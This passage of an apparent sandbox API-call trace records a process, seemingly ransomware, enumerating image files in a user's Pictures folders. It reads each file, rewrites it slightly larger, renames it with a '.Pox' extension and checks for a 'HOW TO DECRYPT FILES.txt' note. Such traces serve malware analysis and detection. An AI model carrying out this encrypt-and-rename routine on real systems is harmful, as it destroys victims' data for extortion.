HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\tdyd6ro.png"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd51fda70, ftCreationTime.dwHighDateTime=0x1d4c99d, ftLastAccessTime.dwLowDateTime=0x267f3ed0, ftLastAccessTime.dwHighDateTime=0x1d4ca1e, ftLastWriteTime.dwLowDateTime=0x2a672dc0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x173a0)) returned 1 [0040.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0040.637] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\tdyd6ro.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\TDyD6ro.png.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\tdyd6ro.png.pox")) returned 1 [0040.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT", lpFilePart=0x0) returned 0x4b [0040.637] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\", lpFilePart=0x0) returned 0x4c [0040.638] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a1d2d0, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x95555fd0, ftLastAccessTime.dwHighDateTime=0x1d4cb66, ftLastWriteTime.dwLowDateTime=0x95555fd0, ftLastWriteTime.dwHighDateTime=0x1d4cb66, nFileSizeHigh=0x0, nFileSizeLow=0x147b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="410lMwN4DJvOy-c5xr-S.gif", cAlternateFileName="410LMW~1.GIF")) returned 1 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7652c450, ftCreationTime.dwHighDateTime=0x1d4c833, ftLastAccessTime.dwLowDateTime=0x312cc9e0, ftLastAccessTime.dwHighDateTime=0x1d4c8bd, ftLastWriteTime.dwLowDateTime=0x312cc9e0, ftLastWriteTime.dwHighDateTime=0x1d4c8bd, nFileSizeHigh=0x0, nFileSizeLow=0xa7ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="D84j8.bmp", cAlternateFileName="")) returned 1 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeda1a6b0, ftCreationTime.dwHighDateTime=0x1d4cae6, ftLastAccessTime.dwLowDateTime=0x32db64b0, ftLastAccessTime.dwHighDateTime=0x1d4d207, ftLastWriteTime.dwLowDateTime=0x32db64b0, ftLastWriteTime.dwHighDateTime=0x1d4d207, nFileSizeHigh=0x0, nFileSizeLow=0x182c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="DuJteP9pnzDt5F-P8c.bmp", cAlternateFileName="DUJTEP~1.BMP")) returned 1 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9540de00, ftCreationTime.dwHighDateTime=0x1d4d3d8, ftLastAccessTime.dwLowDateTime=0x40c2b970, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x40c2b970, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FzrsK7RRKiV.gif", cAlternateFileName="FZRSK7~1.GIF")) returned 1 [0040.638] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac4d5390, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0x40caf380, ftLastAccessTime.dwHighDateTime=0x1d4d458, ftLastWriteTime.dwLowDateTime=0x40caf380, ftLastWriteTime.dwHighDateTime=0x1d4d458, nFileSizeHigh=0x0, nFileSizeLow=0x1576d, dwReserved0=0x0, dwReserved1=0x0, cFileName="OoqGGzLkrpOMIx.gif", cAlternateFileName="OOQGGZ~1.GIF")) returned 1 [0040.639] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0040.639] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0040.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.639] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.639] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0040.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT", lpFilePart=0x0) returned 0x4b [0040.639] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\", lpFilePart=0x0) returned 0x4c [0040.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405f08 [0040.639] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2cad5860, ftCreationTime.dwHighDateTime=0x1d4c761, ftLastAccessTime.dwLowDateTime=0xe35f2d60, ftLastAccessTime.dwHighDateTime=0x1d4cbe2, ftLastWriteTime.dwLowDateTime=0xe35f2d60, ftLastWriteTime.dwHighDateTime=0x1d4cbe2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.639] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58a1d2d0, ftCreationTime.dwHighDateTime=0x1d4d048, ftLastAccessTime.dwLowDateTime=0x95555fd0, ftLastAccessTime.dwHighDateTime=0x1d4cb66, ftLastWriteTime.dwLowDateTime=0x95555fd0, ftLastWriteTime.dwHighDateTime=0x1d4cb66, nFileSizeHigh=0x0, nFileSizeLow=0x147b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="410lMwN4DJvOy-c5xr-S.gif", cAlternateFileName="410LMW~1.GIF")) returned 1 [0040.640] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7652c450, ftCreationTime.dwHighDateTime=0x1d4c833, ftLastAccessTime.dwLowDateTime=0x312cc9e0, ftLastAccessTime.dwHighDateTime=0x1d4c8bd, ftLastWriteTime.dwLowDateTime=0x312cc9e0, ftLastWriteTime.dwHighDateTime=0x1d4c8bd, nFileSizeHigh=0x0, nFileSizeLow=0xa7ef, dwReserved0=0x0, dwReserved1=0x0, cFileName="D84j8.bmp", cAlternateFileName="")) returned 1 [0040.640] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeda1a6b0, ftCreationTime.dwHighDateTime=0x1d4cae6, ftLastAccessTime.dwLowDateTime=0x32db64b0, ftLastAccessTime.dwHighDateTime=0x1d4d207, ftLastWriteTime.dwLowDateTime=0x32db64b0, ftLastWriteTime.dwHighDateTime=0x1d4d207, nFileSizeHigh=0x0, nFileSizeLow=0x182c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="DuJteP9pnzDt5F-P8c.bmp", cAlternateFileName="DUJTEP~1.BMP")) returned 1 [0040.640] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9540de00, ftCreationTime.dwHighDateTime=0x1d4d3d8, ftLastAccessTime.dwLowDateTime=0x40c2b970, ftLastAccessTime.dwHighDateTime=0x1d4cdf2, ftLastWriteTime.dwLowDateTime=0x40c2b970, ftLastWriteTime.dwHighDateTime=0x1d4cdf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d8e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FzrsK7RRKiV.gif", cAlternateFileName="FZRSK7~1.GIF")) returned 1 [0040.640] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac4d5390, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0x40caf380, ftLastAccessTime.dwHighDateTime=0x1d4d458, ftLastWriteTime.dwLowDateTime=0x40caf380, ftLastWriteTime.dwHighDateTime=0x1d4d458, nFileSizeHigh=0x0, nFileSizeLow=0x1576d, dwReserved0=0x0, dwReserved1=0x0, cFileName="OoqGGzLkrpOMIx.gif", cAlternateFileName="OOQGGZ~1.GIF")) returned 1 [0040.640] FindNextFileW (in: hFindFile=0x405f08, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac4d5390, ftCreationTime.dwHighDateTime=0x1d4ca45, ftLastAccessTime.dwLowDateTime=0x40caf380, ftLastAccessTime.dwHighDateTime=0x1d4d458, ftLastWriteTime.dwLowDateTime=0x40caf380, ftLastWriteTime.dwHighDateTime=0x1d4d458, nFileSizeHigh=0x0, nFileSizeLow=0x1576d, dwReserved0=0x0, dwReserved1=0x0, cFileName="OoqGGzLkrpOMIx.gif", cAlternateFileName="OOQGGZ~1.GIF")) returned 0 [0040.640] FindClose (in: hFindFile=0x405f08 | out: hFindFile=0x405f08) returned 1 [0040.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0040.640] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0040.641] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", lpFilePart=0x0) returned 0x55 [0040.641] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.641] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\d84j8.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.641] GetFileType (hFile=0x26c) returned 0x1 [0040.641] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.641] GetFileType (hFile=0x26c) returned 0x1 [0040.641] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0xa7ef [0040.641] ReadFile (in: hFile=0x26c, lpBuffer=0x242fdb4, nNumberOfBytesToRead=0xa7ef, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x242fdb4*, lpNumberOfBytesRead=0x3ae414*=0xa7ef, lpOverlapped=0x0) returned 1 [0040.648] CloseHandle (hObject=0x26c) returned 1 [0040.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.664] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", lpFilePart=0x0) returned 0x55 [0040.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\d84j8.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.665] GetFileType (hFile=0x26c) returned 0x1 [0040.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.665] GetFileType (hFile=0x26c) returned 0x1 [0040.665] WriteFile (in: hFile=0x26c, lpBuffer=0x249c384*, nNumberOfBytesToWrite=0xa7f0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x249c384*, lpNumberOfBytesWritten=0x3ae408*=0xa7f0, lpOverlapped=0x0) returned 1 [0040.667] CloseHandle (hObject=0x26c) returned 1 [0040.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp", lpFilePart=0x0) returned 0x55 [0040.668] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp.Pox", lpFilePart=0x0) returned 0x59 [0040.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.668] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\d84j8.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7652c450, ftCreationTime.dwHighDateTime=0x1d4c833, ftLastAccessTime.dwLowDateTime=0x312cc9e0, ftLastAccessTime.dwHighDateTime=0x1d4c8bd, ftLastWriteTime.dwLowDateTime=0x2a6bf080, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xa7f0)) returned 1 [0040.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.668] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\d84j8.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\D84j8.bmp.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\d84j8.bmp.pox")) returned 1 [0040.669] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", lpFilePart=0x0) returned 0x62 [0040.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0040.669] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\dujtep9pnzdt5f-p8c.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.669] GetFileType (hFile=0x26c) returned 0x1 [0040.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0040.669] GetFileType (hFile=0x26c) returned 0x1 [0040.669] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0x182c1 [0040.669] ReadFile (in: hFile=0x26c, lpBuffer=0x34ea9f8, nNumberOfBytesToRead=0x182c1, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x34ea9f8*, lpNumberOfBytesRead=0x3ae414*=0x182c1, lpOverlapped=0x0) returned 1 [0040.670] CloseHandle (hObject=0x26c) returned 1 [0040.686] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0040.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0040.687] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0040.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0040.687] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", lpFilePart=0x0) returned 0x62 [0040.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0040.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\dujtep9pnzdt5f-p8c.bmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0040.689] GetFileType (hFile=0x26c) returned 0x1 [0040.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0040.689] GetFileType (hFile=0x26c) returned 0x1 [0040.689] WriteFile (in: hFile=0x26c, lpBuffer=0x3563838*, nNumberOfBytesToWrite=0x182d0, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x3563838*, lpNumberOfBytesWritten=0x3ae408*=0x182d0, lpOverlapped=0x0) returned 1 [0040.691] CloseHandle (hObject=0x26c) returned 1 [0040.692] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp", lpFilePart=0x0) returned 0x62 [0040.693] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp.Pox", lpFilePart=0x0) returned 0x66 [0040.693] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0040.693] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\VpubQOvc\\2xdnrnaXUHwWYk2evk3\\LXgD hT\\DuJteP9pnzDt5F-P8c.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\vpubqovc\\2xdnrnaxuhwwyk2evk3\\lxgd ht\\dujtep9pnzdt5f-p8c.bmp"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeda1a6b0, ftCreationTime.dwHighDateTime=0x1d4cae6, ftLastAccessTime.dwLowDateTime=0x32db64b0, ftLastAccessTime.dwHighDateTime=0x1d4d207, ftLastWriteTime.dwLowDateTime=0x2a70b340, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x182d0)) returned 1 [0040.693] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0040.693] 